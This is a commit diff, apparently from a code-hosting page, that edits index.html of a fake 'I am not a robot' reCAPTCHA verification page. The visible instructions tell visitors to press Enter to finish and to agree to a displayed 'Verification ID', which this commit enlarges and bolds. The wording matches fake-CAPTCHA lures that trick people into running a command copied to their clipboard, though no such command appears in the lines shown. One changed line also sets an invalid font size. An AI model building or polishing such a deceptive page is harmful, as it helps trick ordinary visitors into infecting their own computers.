enotkrutoy commited on
Commit
a520916
·
verified ·
1 Parent(s): 282e733

Update index.html

Browse files
Files changed (1) hide show
  1. index.html +12 -10
index.html CHANGED
@@ -1,4 +1,3 @@
1
- <!doctype html>
2
  <!DOCTYPE html>
3
 
4
  <html lang="en">
@@ -8,6 +7,12 @@
8
 
9
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.0/css/all.css">
10
  <style>
 
 
 
 
 
 
11
  .container {
12
  font-family: Roboto, helvetica, arial, sans-serif;
13
  }
@@ -189,7 +194,7 @@
189
  .verify-main {
190
  padding: 5px;
191
  color: #111;
192
- font-size: 13px;
193
 
194
  }
195
 
@@ -264,15 +269,13 @@
264
  Press <b>Enter</b> on your keyboard to finish.
265
  </li>
266
  </ol>
267
- <p>
268
- You will observe and agree:
269
- <br>
270
  <code>
271
- ✅ "I am not a robot - reCAPTCHA Verification ID: <span id="verification-id">146820</span>"
272
  </code>
273
- </p>
274
-
275
-
276
  </main>
277
  </div>
278
  <footer class="verify-container verify-footer">
@@ -430,4 +433,3 @@
430
  </script>
431
  </body>
432
  </html>
433
-
 
 
1
  <!DOCTYPE html>
2
 
3
  <html lang="en">
 
7
 
8
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.0/css/all.css">
9
  <style>
10
+
11
+ .bold-large-text {
12
+ font-weight: bold;
13
+ font-size: 36px;
14
+ }
15
+
16
  .container {
17
  font-family: Roboto, helvetica, arial, sans-serif;
18
  }
 
194
  .verify-main {
195
  padding: 5px;
196
  color: #111;
197
+ font-size: px;
198
 
199
  }
200
 
 
269
  Press <b>Enter</b> on your keyboard to finish.
270
  </li>
271
  </ol>
272
+ <p class="verify-main">
273
+ You will observe and agree:
274
+ <br>
275
  <code>
276
+ ✅ "I am not a robot - reCAPTCHA Verification ID: <span id="verification-id" class="bold-large-text">4743</span>"
277
  </code>
278
+ </p>
 
 
279
  </main>
280
  </div>
281
  <footer class="verify-container verify-footer">
 
433
  </script>
434
  </body>
435
  </html>